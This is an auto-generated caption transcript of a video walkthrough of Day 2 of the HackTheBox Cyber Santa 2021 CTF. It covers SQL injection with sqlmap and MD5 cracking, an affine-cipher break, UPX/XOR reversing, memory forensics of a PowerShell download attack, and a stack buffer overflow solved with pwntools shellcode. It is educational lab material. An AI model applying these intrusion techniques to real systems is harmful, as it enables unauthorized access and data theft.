Day 2 - HTB Cyber Santa CTF: HackTheBox Capture The Flag 2021

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

in this video we're going to take a look at some of the challenges from day two of the hector box cyber santa capture flag competition if you didn't check out day one's video go and check it out but essentially we've got five challenges a day for five days one from each of these categories and i'm going through the video in order of the number of solves so at the moment we've got the most solves on the web challenge and the description for it says the evil elves have changed the admin access to santa's toy management portal can you get access back and save christmas so we've got a docker file which is a docker container which is launched we've got some files to download and if you're going to take a look here we've got a docker script so we could launch the docker if we wanted to we can immediately see we've got a 10.5.13 maria db which is interesting we can open this up in codium as well so we can go and have a look through the code immediately again we'll see in the entry point we've got this database which is being created so a big hint straight away what the challenge is going to involve i just mentioned that whenever i was actually solving this because all these challenges come out at once it's kind of a race to see who can solve them first i didn't go straight into the code here with the web challenge actually the web challenge i launched the docker container for while i was starting to take a look at some of these other challenges so for example the forensics file takes quite a long time to download so start downloading not and we can go and open up the reversing binary in gear drone stuff and at the same time just launch this docker container so that we can go and have a quick look at the web challenge and just see is it an easy win can we just do admin admin and login or can we do a sql injection so if we change this to let me just so you can see this so we could do or one equals one so if there is a sql statement there which is saying select all from select user from sorry select username from users where username equals admin and where password equals this value if we close off that sql statement and then insert this query so it says if the username equals admin and if the password equals nothing or if one equals one which it always will do so this would come back true but in this case you don't get anything so another thing we might want to do anyway is just see if there are any other kinds of sql injections so that would be an sql injection whereby let me just do a normal query though that would be an sql injection whereby it would just give us an immediate login but there are other types of sql injection vulnerability and if we wanted to very quickly identify one we could use sql map and you can use sql map you can pass in a url and some post data or some get parameters or something like that but you can also if you want to do things quickly we can pass it in a post request so that's why we take a copy of this here and then we'll just go and create a new dot request file save this post request in there and i just let sql map do what it needs to do it's going to run through it's going to try a few different types of sql vulnerabilities here as you can see for different versions of sql and it's trying for time and error based injections as well uh we're gonna just hit yes on all the default prompts i've kind of gone through this before even really looking into the code but we'll go through the code in a second as well because it's important that we know what how to approach challenges if we can't just easily identify how to what the vulnerability is from the website or from knowing a tool or something like that that we can go and have a look at the code and know what's worth investigating but if we go back to our sql map we can see that it's identified a potential payload and now we want to just run through and find out what it's come back with the version of mysql what we're going to do now is just dump the database you can specify you can use dash capital d to specify a database and dash capital t to specify a table and you can specify columns i guess dash capital c etc but i'm just going to try to dump out the entire database and essentially what's happening here is whenever a query is made to the database for example if it tries to ask what is the first character of the password and we say we ask is the first character of the password in a and if it comes back in say one second we know it's true that it begins with an a if it comes back in say two seconds then it's false and we can basically go and probe every character then to identify what they are so that's why as you can see it's going to take quite a long time to go through this so let's go and take a look at the code as well so we'll want to go straight to the sql side of things let's have a look at this database dot js file we can see we've got a toy db you can see the user here and the pass obviously this is just the code which is set up for us it's not going to be all the same values um we've got a function to connect to the database we've got a function to list toys so it's going to select all from the toys list where approved equals 1 or another value if that's sent in we've got a login user function which is just going to select username from users where the username equals the user we provide and the password equals the password we provide so this is where we're kind of saying if we could have closed off this quote and said or one equals one and then this would have been two conditions so as long as one of these conditions is true it would have allowed us it would have got through to the next stage we've also got getuser as well which is just going to select all from users where username equals username is provided and if we go into our database.sql we can see that this is the ultimate goal is going to be to retrieve the values from the toy list because one of them is the fake flag or the real flag on the server but the the other items all have approved set to one and this one has zero so there's only i'm gonna need to make sure that we have that level of access as well we can also see we've got two users a manager and an admin looks like md5s we can go and do hash id to verify that well to get some potential hashes and then we could run hashcart you can see here some examples but we've also got the documentation up here so there's a lot of different modes you can run depending on the hash type in this case we're using md5 which is mode 0 so we can do hashcart m0 paste in the hash and then give it a word list go to a share wordless the classic is rock u.txt you could also use something like crack station reel oh that's okay it's in the pot file for me doing it earlier so because it's already been cracked we can just do show and find that that is big santa let's try and do that with the second in fact um if we want to have a look another tool we could do this with we could also use john the ripper so let's create a file here let's go and grab the other hash for the admin and we'll save that we'll go and run john hash give it rock you this time it's going to run through in this case it will it should identify the hash type and give us it didn't okay it actually gave the wrong type i guess it should be this let's try that i don't use john as often as you can see but yeah we provide the correct hash type raw md5 and we get back try harder normally i just go to crackstation.net to be honest as even with my crack station word list which i got from this site it doesn't have the full range that are available on the crack station server and they'll be able to look it up a lot quicker we can provide up to 20 hashes from a variety of different types and that should come back um but let's go and have a look see how no let's go back to your code actually before you see how that's going so we've seen the database as well there's not really too much else in here we could go and have a look through the html we've got a dashboard we've got a login not likely to be of much interest we're going to have a look at client-side javascript but server-side is probably going to be more interest to us to begin with we've got some authentication here this is again not too much interest but notice that's using a json web token helper you can see the helper here so i actually thought initially whenever i looked into the code as well this might have something to do with it that it might be a two-stage challenge let's go and see did i miss anything so this is uh no rootsindex.js okay so this is where we've got our post api login and you can see that it's creating an md5 hash of our password it's going to try and log in with the username and the md5 and if we get it incorrect it'll say invalid otherwise it's going to do sign a js json web token and allow us to log in we've also got the get dashboard again not too much interest in and we have get toy list as well and you can see that whenever we request the toilets it's actually going to check to make sure we're admin and if so set approved zero otherwise approved to be one so we need to make sure we are the admin in order to be able to read these toys i think that's about it in terms of the code i probably probably flew through that maybe a bit too quick but uh we know sql map is working for us anyway so we can go back we can see we've got our two md5 hashes here let's take these to crack station and it comes back with two hashes so we did actually have the correct hash for the manager let's go and try and log in yep we'll send the case successfully so we can log in as the manager and if you're going to have a look here our storage then we will see that we have this json web token we could if this was a different vulnerability that required this we might go and take this to jwt dot io or you can if you have burp suite here and the json web token extension you can go and paste that in here and we can see what it's comprised of although obviously we know this from the code anyway what algorithm it's using and the payload has the username in it and then the time of access is it and also the signature that's being used but we need the secret key so that might be something you go and crack or you could try to change the algorithm to none or there's a lot of different attacks for json web tokens but in this case we have an admin password as well so let's go and try to log in with admin magical christmas we log in and we get back our flag all right so i probably spent about 10 minutes explaining that and showing a couple of different tools which maybe wasn't uh completely necessary you can see hash cap will also give us the option to crack the hashes although it'll probably be quite slow you can see that we can provide a word list so we can have it actually brief force through characters but uh yeah probably spent a bit longer than we needed to you know it really was just a case of running sql map and dumping the database and then cracking the password and logging in but i think it's worth just reviewing the code anyway and having a look at a couple of different tools we can use to crack caches the next challenge is called xmas spirit it's a crypto challenge and the description says now that elves taken over santa has lost so many letters from the kids all over the world however there's one kid who managed to locate santa and send him a letter it seems like the x-men spirit is so strong within this kid he was so smart they even thought of encrypting the letter in case elves captured it unfortunately santa has no idea about cryptography can you help him read the letter so we had two downloadable parts for this one let's have a look we've got a encrypted.bin and challenge.py don't worry about the solved script of the crypto gets those shortly and we can try to print out the encrypted.bin just to see what it looks like actually causes some problems with the terminal and let's open up the challenge.py script we open this up and we can see we've got this encrypt function let me maximize that we've got an encrypt function we've got the letter.pdf file is being opened we're calling encrypt on it and then we're writing the encrypted dot bin so it's not too much happening here all the stuff's happening in this encrypt function where we have a modular set of 256 and while true it's going to go through it's going to grab a random integer between 1 and 256. it's going to keep doing that until it finds a number where the greatest common divisor is equal to one and then it's going to break then it's going to work out it's going to assign a b which is also going to be a random value between 1 and 256 and then it's going to go through the encryption where each byte in the letter.pdf is going to go through this process of a times byte plus b modulus 256. the reason it's 256 is we have a range of 256 bytes from 0 zero to f f and we need to reverse this so uh there is a similar challenge which i came across in fact let me open up here if we were if we didn't know how to approach this challenge we'd probably start googling around for some similar looking code and see how it was solved if you do that you'll find this baby encryption how to box right up and it's the slightly similar code we've got the same sort of principle if it ever on blurs this is the decryption where's the encryption okay so here we've got our encryption here it's basically going through the same thing for each chart and message it's going to first do a subtraction ours was doing that as well but it was well it's doing a plus but it's just doing it all as one so it's kind of similar and then it's gonna do the multiplication and then the modulus the differences here all they were all they had to do was go and reverse that algorithm and plug in the values for us we don't know what this we don't know what a and b are so we don't know what 18 and 179 are there are 256 bytes possible so we could potentially loop through but you have a random a and a random b so you've got 256 times 256 possibilities you could potentially loop through and brute force that and essentially we can do a known plane text attack because we know that the beginning of letter pdf is going to have the pdf file signature so we search pdf magic bytes we can go and have a look at list of file signatures we'll just do ctrl f here for pdf and we'll see that a pdf file should begin with these characters or these values and hacks so we know that we could go through and we could basically try to decrypt the first five characters of the encrypted dot bin see do they equal that pdf file header and if they do continue with the encryption if not go through to the next key but we can do it a bit smarter than that we can actually reverse this algorithm and try and identify what a and b are we would also need to inverse this modular function as well on the reverse which is something that can be done quite easily now in python 3.8 you can just use an inverse function otherwise manually this would be done using euclidean algorithm extended euclidean so let's go and see how we can solve this this is the type of cypher this is called is an a fine a fine cipher and we could go and google that and bring up some information how can we solve it there is a decoder you've actually got this on cyber chef and on decode.fr as well which um sometimes comes up in challenges where if you know what the key is or if you want to try and brute force you can normally do that with these sites let me copy over a link which i use when trying to go through this so and i find cipher in a fine cipher the letters the original message was first identified with integer values so in this case there's 26 letters in the alphabet our alphabet has 256 bytes in it because that's a range of bytes and this is the function so the encryption is going to be to get each encrypted character we'll do a times x plus b modulus 26 for us that is modulus 256. and this basically this goes through an example i'll not go through all this you can go and check out this link and it goes through how we can recover it so if we know some of the plain text if we guess a couple of the characters or in our case we know that some of the characters are going to be pdf then we can perform an equation to to reverse that and work out what a and b are once we've got a and b we can just build up a decryption function so you can go through this go and read about a fine ciphers there's some good videos and stuff online we could also go to try and find some similar scripts so we could search like a fine decrypt ctf write up and just try and find some similar write-ups in the past where we can maybe maybe the script won't be the same but we can go and adapt it we could search a fine plain text attack known plain text and see what we get i actually came across a github link whenever i search this although some reason whenever i search things in go i don't seem to get let's go to results let's go and have a look in google have a look in google we've got a github here as well which gives us an example of basically the kind of code that we need to run here to calculate this this is the inverse module which we can do with an inverse function in python and what i'm going to do here because i hate crypto i hate talking about crypto i hate maths i'm going to copy over the script which i've got to solve this and we'll talk through what we've got there and see how it runs so paste this in here i've kept the encrypt function in we don't really need it here i've just kept that in just so we can compare the two functions and we've got we're loading in our encrypted dot bin i've also imported pwn tools here it's really not needed but it's just so that i can use read and on hex and right it just shortens the code a little bit and yeah we're going to read encrypted dot bin we're going to unhex the pdf file header which we saw on the list of file signatures here two five five zero etcetera you could actually just put that in a text but quite a lot of file signatures don't represent properly as characters and then that's our known plain text we're then going to recover a and b using the known plain text and the ciphertext so as long as we have these two characters of each you can see here we're doing dt which is our encrypted bin we're taking the we're subtracting the first character from the second character and then we're going to multiply it by this inverse we're doing the inverse modulus as saying in python 3.8 you can just use the inverse function to do this and then we're subtracting the first element of the plain text from the second element of the plain text this is the inverse modulus that's being done there and then we're doing mod by 256 and then to get b we're subtracting the a that we just worked out a times the first plain text character from the first ciphertext character mod 256 and that's recovering our key basically we've got a and b back as you can see why i hate doing crypto challenges or describing crypto challenges should i say but we've got our key we can now run this decrypt function which is going to pass in our ciphertext or encrypted.bin and the a and the b and this is quite simple here we're just basically reversing this function we don't need to do this because we're not calculating a key this time we already know what the key is we don't need to loop through uh we've got mod already defined so we're literally just recreating this one we're reversing this function and we're saying each byte in the ciphertext in this case we want to do this inverse of the a key so we're doing inverse modulus on this times the byte the encrypted byte minus b which we calculated previously and then we're doing mod 256 and then we just add that to our results and once the whole thing is completed then we can just write that to a pdf file so let's try and run it it took about 20 seconds to run and then if we have a look here we've now got this decrypted.pdf so we can go to try and open it we can we should be able to see let me see if we can see a thumbnail here we can't actually let's try and open it anyway i'm just getting loading okay we can see a thumbnail so for some reason whenever i try to load the pdf it doesn't actually load for me i don't know do i just need to wait for ages but what i just did here instead was use pdf to text or you could use some other pdf tool if you're just searching calif just do pdf and tab you'll see you've got quite a lot here so you can do to html you can do to to text etc so i'm going to do pdf to text pass in decrypted pdf and that's going to create a txt file which has got all of our text in it and you can see we've got back our flag hack the box and find cipher is simple maths while we're looking at a crypto challenge let me just take a second to address some questions i get about crypto if you're not interested in this just skip through to the next challenge but i just thought i'd mention it because i get a lot of questions asking why don't do crypto challenges can i help with somebody's crypto challenge why i don't do crypto videos et cetera because obviously my name is cryptocat um cryptocat was more just the you know forensics cat or like reversing cart didn't really sound as good it's not that i hate crypto but i don't particularly enjoy it i think it's quite heavy on maths which i'm not a big fan of generally but it's not i don't have any experience with crypto i've done a couple of crypto modules i did one in my final year university where we had to code des aes rsa and a couple of other ciphers like hill and playfair cipher in java and we had to learn the extended euclidean algorithm and things like that to do manually in our written exam i then went on to help teach that module whenever i was doing my masters which also had a crypto module where i had to go through all that same stuff again but also some new algorithms like um elliptic curve crypto and stuff like that i actually did during that module did a paper on honey encryption as well which is a really interesting technique um if you're interested in this you can go and grab this paper from if you're on go to my youtube channel well you're on my youtube channel if you go to the home page you can click on my academic profile and go and see some of the papers that i've put out this was just a kind of a practice paper as part of the coursework but it's really interesting technique if you're interested in learning about that um i also have a lot of notes from the time when i was doing these exams so obviously you can see this is like five six years ago and i've basically avoided crypto ever since and the reason being this was the sort of questions that i was having to deal with this was the sort of working out that i was doing and to me even just looking at this stuff now gives me a headache i really don't have much interest in learning all this stuff again but um i did learn it once in fact i learned it more than once i learned it basically every year whenever i had to help teach students this stuff but nowadays i prefer working on other categories so if you ask me to do a crypto challenge or do a crypto video the answer is almost certainly no and that's why the next challenge is called gift wrapping it's a reversing challenge and the description says the elves won't let you inside their secret hideout without the password luckily they've given it to you as a gift but it seems to be wrapped up tight so we've got a file to download in this case i've already got open in geardrive but let's go and just take a look at the file type here as well and we'll see that it's a 64-bit lsb executable statically linked no section header let's make it executable just to try to run it now let's also have a look at the strings here let's do strings greater than 10 gift wrap and one of the things we'll notice here is upx is used upx is a packer we've got upx installed here upx dash help will tell us how we can use it and we can use it to decompress using the dash d flag so if we go to our code if we go over to geardraw you'll see we've got an entry function here and we can go and start to have a look through this but actually it's going to be quite obfuscated in terms of the functionality and that's because it's been packed so we want to unpack it because we know what type of pack is used it won't be too difficult to do we can just do upx dash d gift wrap it's unpacked and now we want to import this again in geardrop and now if we go and have a look at the functions here we have quite a lot of functions so it's actually it actually looks a bit harder here but if we just know to look for the main function we can go and search for that and we'll find main right oh it's still trying to load stuff there we go find main and have a look we've got some variables declared here all set to zero and then we've got this printf what is the magic word let's go and check this out let's run it it asks us what's the magic word say abc wrong password okay we could do ltrace okay we can't do our trace let's have a look at this code then see what's going on so we can see we've got this local c variable local 11c which is going up to 100 and hex which is 256 in decimal if you're not sure what it equals we can go over to the left and select it where is it well there's 110 anyway that's 272. and it's gonna basically loop then 256 times it's going to increment each time and it's going to set the value at local 118 plus the loop counter to equal local 118 plus loop counter xored with 0x f3 so it looks really complicated that but i mean all it's all we're really looking at there is let me just open up some python all we're looking at is for i in range 256 um array i equals array i xord with 0x f3 yeah it looks more complicated but that's all we're looking at in that loop so we know that it's doing some xor in with whatever we enter as the magic word that's into local 118 and it's xor in the whole thing with f3 and then it's going to call this function which is going to say it's running a check here and we've got a check variable which we can go and double click and see here on the left that it's actually a lot of hex values you see here as well the h at the end so we've got like 24 hex values and that's being compared with our value so because xor is a reversible function we can go and reverse what we have there with 0x f3 to get back our flag just for anybody who's not aware of us or has forgotten as well how the xor function actually works in terms of being reversible let's just open this up in sublime and put together a byte a couple of bytes here so if we have a some plain text which equals this and we've got a key which equals i'm just gonna put together another random value we can do an xor operation where we say only if it's only if one of these is a one or a zero is it are we gonna have a one so this would be a one but here we've got two zeros so that would be a zero then we've got two ones that be zero two one zero two zero zero and we've got an xor an exclusive or so only one of them is a one and then zero zero i probably didn't pick very good values for that uh the issue with xor is that if you have any two of these three pieces of information you can always work out the third so that means if an attacker if we send them this cipher text and we send them the key they can get the plain text but if we send them a cipher text and the plain text they can get back the key so let's just imagine they did that let's say we sent them this plain text the ciphertext they would just go and do that reversible operation and say zero zero one one zero zero zero one and they've recovered the key what we're going to now do is go and grab this value we can go and do an xor in you can go and do it in python or phone tools or cyber chef i'm gonna pick cyber chef but i want to go and grab this check these values without typing them out manually so i'm going to set a breakpoint up around here i'm going to grab a copy of this address 401 a04 i'm going to open this up in gdb let's do break some memory address 0x so we'll now run this we'll say whatever abc and we know here then that this is this function is being called check is the first parameter so this is 64-bit binary so it's the rdi rsi rdx is the calling convention so the first thing we're going to want to do is print out what's in the rdi which is right here um you can do let's do help x just to see how we can print let me minimize this so you can print in some different ways here we can do like x uh our rdi but we we're not printing enough here so we could do x over 10 x or s depending if we want a string or c for a char as you can see here for us we're going to get it as hex because not all of them will be characters that we can represent but to make it a bit easier we can also then say the greatest size here is g for giant so we can do x over g x uh sorry we need to provide the register so rdi and that prints that out so let's do that let's do four of them and there we've got enough we've got our full flag there so now i'm going to do is going to take these to cyber chef we can paste these in here one by one and then we're going to want to xor them we want to also before we act so we actually wanted to well actually one thing to just bear in mind here as well let me go back to geardrop geardrop and cyberchef wow it won't let me sh it won't let me see the input if we minimize the window all right well the issue here i'm going to double check double click on check again oh god too many windows um yeah the issue here you can see here we've actually got this is a7 bb a7 b1 whereas we have this in the reverse order so bb a7 b1 so we need to make sure that's reversed into the correct endiness so let's also just before we do that do our xor let's swap the endianness and we want to make sure this is 8 as the word length so this is looking better bb a7 b1 etc we want to do our xor with zero x3 oh sorry f3 and that's not looking good and the reason being we're xor in hex with hex but we actually want this to be raw so let's save from hex we paste that in and then we get back our flag so hack the box gpx ain't so hard probably a few different ways to do that but um that's how i solved it anyway in pwn tools you can very easily just do xor and then a b and just print that and that will xor two values together two strings or something like that and you'll remember that how i said that was a reversible function so now that we have the flag if we go and input this into the program it's gonna come back and say welcome inside because it's taken the flag off of us it's xored it with 0x f3 and it's got to the third value so as we described a minute ago as long as we have any two pieces we can get the third and because we had the flag in that case and the key of f3 we knew what the key was we were able to enter in the correct password as well the next challenge is called honeypot it's a forensics challenge and the description says santa really encourages people to be on his good list but sometimes he's a bit naughty himself he's using a windows 7 honeypot to capture any suspicious action since he is not a forensics expert can you help him identify any indications of compromise and we're told to find the full url used to download the malware find the malicious process id find the attacker's ip address and then submit the flag in the format of this where we basically need to md5 the url the malicious process id and the attacker's ip address we've got this forensics honeypot.zip which i've already got downloaded and extracted because it's quite a big file so we can check the file type there we'll see it's just data we could have a look at the strings and there's a lot of strings in here we might want to try and start grapping through some stuff but if you've seen challenges like this before you'll know straight away what tool will need to use to analyze this if you haven't some hints are that it mentions here windows 7 honeypot we're being told to find malicious process id and an ip address and a url so these are things you typically do in a memory dump something which can be analyzed with a tool called volatility but if we even go to let's go to hack tricks and just assume we didn't know what the tool was that we would be looking to use for this challenge we could go and do a search for memory and just see what comes up you see here we've got memory dump analysis gonna have some problems with hat tricks here by the looks of it um and we have volatility here is the first thing that comes up it tells us an open source framework for memory dump analysis and if we click on that we'll get the full cheat sheet in volatility you can see there's actually an auto volatility which we can use to basically run through all of the volatility plug-ins which you can see the type of plug-ins that'll run here we can go to volatility's github and have a look at their reference let me have a look actually reference or let's go for plugins there's a volatility two and three by the way and they are very different in terms of the syntax you can see here on hat tricks that depending on the commands that you'll be using you can swap between the two different syntaxes here one of the most notable things is volatility 2 you have to identify the profile and then specify it and if you don't find a profile you'll have to develop a custom one whereas volatility 3 doesn't require that it just has generic kind of plugins so the first thing we would want to do is try to identify the image and that we can do that with image info with volatility 2 which i'm currently using so let's do volatility image info f pass in the image file might take a little while to run let's go and have a look at this reference command reference so you can see here a list of different plugins and things that we can run and you can just basically go and click on these and see what these do we've got some different categories so we can we've got stuff for analyzing the process memory for looking at process lists so we know that we need to get a process id so it's likely to be of interest to us we can also see here we can have a look at the ie history we can look at event logs we can scan for files we can dump files we can dump out processors we can dump out registry keys so we can go and analyze them in other tools like redripper for example and there's a lot of stuff we can do in here we can even access a kind of shell to start running our own commands in here so i think this is a great resource even probably better than the hat tricks here in this case because it's quite easy just to get a list of the different commands and then we just find one of interest let's say for example the ie history and we can go and see what it actually does how to scan internet caching history for urls so auto volatility is great if you're doing a ctf like this where it's kind of a race to solve the challenges the quickest that's something you can have running in the background although it does really slow down your computer because it's going to dump all of the files and processes and things like that let's go and see if we got a profile here so it says the most likely profile is this one let's go and run this again instead of image info as the plugin let's do let's say now are not a plugin sorry our profile is equal to this one and then the plugin we want to run let's try and do just pslist first of all which is process list um note that some of these with some of these process lists and process tree that's not the right one process tree psx view some of them will show hidden processes others won't some of them will show where processes have been spawned by other processes like this one and if we find something of interest we can go and take the process id or take the offset and go and dump it so we could create a new directory called dump and then we could say we want to proc dump d dump directory and then pass in the process id which let's say we wanted to dump this powershell.exe so that's process id 2700 we can do that and you can see okay i actually i actually dumped all of the processes there rather than the individual one okay that's fine we could do that and you can go and start grappling for strings in here or start running these checking the file types the exif data etc we also had the command line option so again i'm just kind of going from stuff that i remember from here but you could if you've not done this stuff before you could go and just start having a look through the key options in hat tricks see here we can dump environment variables for example n vars let's try that one as well you can see this one has printed out our command line and i see something of interest it's going to print out the end files there anyway so starting to print those out but notice what we had here we've got this powershell.exe has executed this it's calling those with window hidden but this is actually our base64 encoded value let's go to cyber chef paste this in from base64 and you'll see that we get our actual command here we want to take these dots out of this as well let me open this up in sublime let's replace the dots with nothing okay so you can see that it's basically going to download in this update.ps1 from windowsliveupdata.com this is certainly of interest to us we don't know exactly what that did but if we go back to our challenge description we're being asked what was the url used to download malware what was the malicious process id and find the attacker's ip so we have a potential url which we could enter here let's go back though and see what else we have we also had the option to check ie history let me see what else we have here we're going to be interested in some of the network stuff as well because we know that we're looking for the attacker's ip address so networking we've got a few different options here a lot of these don't actually work with the windows 7 profile but i know netscan will work for us so you can see the example output this will give us let's go back and see we've got another url here we can see santa at windowsliveupdate.com and this looks more like the sort of url we'd be expecting to see in terms of let me go back to the description once again the url used to download the malware so the malware looks like it was the update.ps1 it was a powershell script but what was the url used to actually perform the attack to begin with so we've got two potential urls anyway but this is the one that we would probably place our bets on let's go and paste this in here we know that powershell was used as well but anyway we've got uh potentially powershell pid is 2700 we've got two different urls and we need to have a look at the net scan this is going to give us all the different ip addresses so a pretty big giveaway here is this four four four four which is the default port used on a materpa payload and if if you use an ms venom i guess they'll probably provide this as a default port as well this is a pretty big hint that this is our attacker's ip address remember not the ip address that the malware was downloaded from but the attacker's ip and we basically have the flag now we've got our three different pieces of information if we do hack the box and then we take our url underscore 2700 is our process id and then the ip address and we need to md5 that as well you can do that i've got um cyber chef open so i'm just going to do that here and this gets us the md5 value you could also do this from the terminal with echo dash n because we don't want a new line to be included in this and md5 sorry echoed echo dash n we provide this as a string and then we'll type that to md5 sum and we get back the same hash so and because we didn't get to cover those in this challenge or because we didn't need to cover them should i say it's also just worth mentioning some of those other features in terms of the registry features so if you go and grab some of these if we extract some of these using auto volatility or using some of these commands here we can use something like redripper or red shell in linux to go and analyze the registers as well so i've done previous challenges whereby there have been has been persistence set up by malware and you need to go and kind of dig through the registry to find it the last challenge is called slay it's sapone challenge and the description says the elves have messed up with santa's sleigh without it he will not be able to deliver any gifts help him repair it and save the holidays we've got a service connect to we've got a file to download so let's go and get things working locally first of all have a look at the file type we'll see it's not stripped so we're going to be able to see the function names and things like that pi is enabled this time so each time the program loads it's going to have a different base address let's just go and have a look at the full binary protections as well so if you watched yesterday's video the day one video from this we had canaries found and we had nx enabled we had pi disabled i think so basically this is going to mean that the the address is going to change each time so it means we either need to calculate or leak the address before we're going to be able to access different offsets or different functions and variables and things in the program but nx is disabled this time so if there's a buffer overflow and we're able to exploit there's no canaries to worry about trip off if we're able to exploit the buffer flow and inject some shell code onto the stack we'll be able to just execute our own code sometimes just looking at these binary protections can be a big hint as to what the challenge is actually going to involve let's make this executable anyway and just try and run it you might want to try and run it and let's do abandon first just see what it does closes it down let's do repair you see it provides an address here trying to enter a value says could not be repaired let's try and run it again you can see it provides a value and the value is different to the one before so because we're getting a value leaked here we're going to want to go and try and work out what that value is let's just try anyway and enter in a long string here to see if there is a buffer overflow we get a segmentation fault so there is a buffer overflow the rest of our input is spilled over into bash so we could identify exactly what the offset is in gdb opponent debug let's open it up let's generate a cyclic pattern of 500 bytes take a copy run the program say we want to repair enter that in let me crash the program and we want to go and have a look and see what's in the rsp we've got this s-a-a-a so let's do cyclic l to look up the offset and we'll find 72 so 72 bytes we need to overwrite before we're gonna overwrite the return address uh ie the instruction pointer with an address that we're gonna control so let's go and take a look at this in gear just so we can understand a bit better what's happening in the code so we'll go straight over to our functions and into the main function we could have a look and see if we got any interesting functions here remember we had a return to win style challenge yesterday where there was a function it wasn't called win or flag but it was called something else and it basically was a win function if we could return to that function we'd get our flag in this case we could have a look through our functions here but we don't have anything of interest let's have a look at our main function we know it's going to it's going to do a setup it's going to print a banner it's going to call slay which is going to do some animations i think and then it's going to call repair if we say one otherwise it's going to say goodbye if we give a 2. and if we go to repair this is where the interest in codes are so we can see here it's going to print out this is printed out you can see the format specifier is p so it's printing out a pointer and the value that's printed as a pointer is this data location uh sorry not that data location that's the like terminal just the output the local 48 is what it's actually printed as a pointer and local 48 is the beginning of this uh buffer so it's actually leaking towards to say where the buffer is because the buffer is going to be a different location each time we saw that whenever we restarted the program it had a different value but it's telling us where the beginning of our data is going to be so it's telling us where that is in memory and then it's saying we can read in a4 bytes which is 164. reading 164 bytes into that variable which we know the location of so if we were to fill this up with some shell code to execute and then overwrite this return address with the address pointing to the beginning of our shell code we can go ahead and execute that 32-bit binaries work a little bit differently whenever we're developing these kind of shell code exploits for them but i'll not confuse things by going into that i've done plenty of videos on 32-bit buffer overflows and 64-bit so you can go back and check some of those out if you're interested what i'm going to do here is go and have a look at some of the scripts on my github so in the last challenge i grabbed a template which i do have here on my github but typically what i actually do rather than using the template is if i come across a challenge and it reminds me of a challenge that i've done before i'll go and have a look at the the script from that challenge and maybe just adapt that and this one immediately reminded me of black computer i had the box challenge which is is different but we're leaking it is leaking an address of the stack and then we're using some shell code to get a shell or to print the flag so it's a good starting point let's go and use this as a template let's call this exploit.py paste this in we don't need to update too much as usual we're going to go and update the name of the binary to what's the binary called slay we'll go and update that we can go and modify our login level if we want to we don't really need this we know that the offset is 72 so we could literally just type in here 72 because we found that in gdb a second ago but i like to automate things so we've got a function here which is going to send in those 500 cyclic bytes and we just need to update this to match the actual program syntax so the program takes a one off of us and then it takes the payload it doesn't ask for a password either so i'm going to change this and we can get rid of this stuff insert all these bytes because prone tools complains that you nowadays so we could just test this make sure that's all working as expected let's go ahead and comment this out and we can see that it found the offset of 72 so it's run that it's exploited the buffer overflow it's looked at the core dump file and it's found out that the correct offset is 72 and it's going to use that then whenever we actually start the program and run our exploit here let's take away some of the stuff we are going to be doing this one to begin with and then it's going to print out that address which we're basically just grabbing here with some regex to extract it and we're going to print it out make sure we've leaked the address properly we're building up our shell code here let's go in i'm going to go and take some of this stuff out so we can just send off our payload here in fact oops that wasn't what we wanted let me just take a copy of take this from our find instruction pointer function and change this to io that's looking good you can see i've got a set to receive a flag because at the moment i'm cutting flag.txt this shellcraft function is basically a module you can run this in the terminal you can do shellcraft and we can provide we need to provide an example of what we want so what does it do shellcraft shellcraft h i think we might need to list payloads with it so you can do shellcraft l you can see i never use this in the terminal but this gives us access to all of the different functions that we can basically call linux programs and stuff and we're going to call flag.txt here this is going to generate the shell code i'm going to assemble it here with the asm function but we could also do this shellcraft.sh to get a shell as well two different options this here is to create a bit of space which normally isn't needed on these challenges but it was needed on the let me see we don't have any syntax highlighting on this to explain it but it's basically going to pop some registers onto the stack to create some space i can't remember exactly what happened you need to go back and check my back computer video for that but we do need that in this case because it's a quite a similar challenge and essentially what we're doing is we're building up a shell code and then our payload this time we're going to say that we want to overwrite the return address at 72 bytes in and the address we're overwriting it with is the stack address that's been leaked to us which is pointing to the beginning of the buffer and in the buffer we're going to put in some padding and some shell code this can go in any order so we could also do this as well just need to make sure there's enough space between the shell code and the padding to make it up to the stack address so you can see that here we're calculating a padding is based on we're doing some new operation instructions but this could just as easily be some a's as is often used for buffer overflows doing some new operation instructions and then we're doing the minus the length of the shell code so as we modify our shell code here it won't break our payload just going to put that back the way it was that's about it we should be able to try and run this this time let's do python exploit try to run it we've got debug mode on so we can see a lot of stuff coming backwards and forwards which is good because we've run into a problem whereby it hasn't found our leaked stack address and the reason being the payload i had in was just going to grab a line and grab the stack address from it and whenever we actually run the program it's on the second line that we get our stack value leaked to us so let's just insert another i o receive line let's try that again nope let's try the exploit again and this time you can see it's compiled our shell code out of the cat flag.txt that's the shell code that's going to execute to print it out and where was the stack address leaked oh here it is okay so there's the stack address that was leaked that's looking good as well the only thing is it didn't actually work here but if we go and [Music] test this out on the server which we can do quite easily using this template just type in here remote paste that in if we run it against the remote server i believe we'll get back no we didn't get back our flag okay let me let me actually try and take out instead of receiving the flag i don't know if the flag's the first thing to come back so let's just change this to i o interactive try that again okay that time it comes back with a flag so because it was receiving two lines actually let me do that again let's go back let's try and make this neat and tidy in fact just before we do that let's just show when we have it set to io interactive we can use this to get a shell as well so instead of doing catflag.txt let's comment that out let's do shellcraft.sh and by the way the reason we don't have to specify whether it's x86 or x64 and things like that here is because we've got our contacts set here so it knows what architecture the binary is so that's that with a shell let's try and run it and you can see it said unfortunately slate cannot be repaired but we don't get end of file error so if we try and list try and do id we try and cut our flag.txt we see that we've got a shell but let's go back and change that to catflag.txt and let's use this flag let's take out the i o interactive and we'll just add in i o receive line here just to make up for that extra line try that again and we still don't get a flag let's try receive lines too try it again okay we did get offline there but we're still getting some error all right forget it it's probably something to do with the new pawn tools and the er all these errors you get to do with bytes and stuff so yeah instead i'll just do i o interactive there just to make that a bit cleaner there should be some other ways to do this as well i think superhero one recently did the back computer challenge using some short shell code maybe with a shell code you can get online like a 22 or 23 byte shell code there's probably some other ways as well but we've got a flag anyway that'll do it for this one and that's gonna wrap it up for the day two challenges so we've been through the challenges in order of the difficulty well in order of the number of solves not necessarily the difficulty and this might change about a little bit but yeah i hope you've enjoyed the video if you have any questions or comments leave them down below thanks

Info

Channel: CryptoCat

Views: 1,633

Rating: undefined out of 5

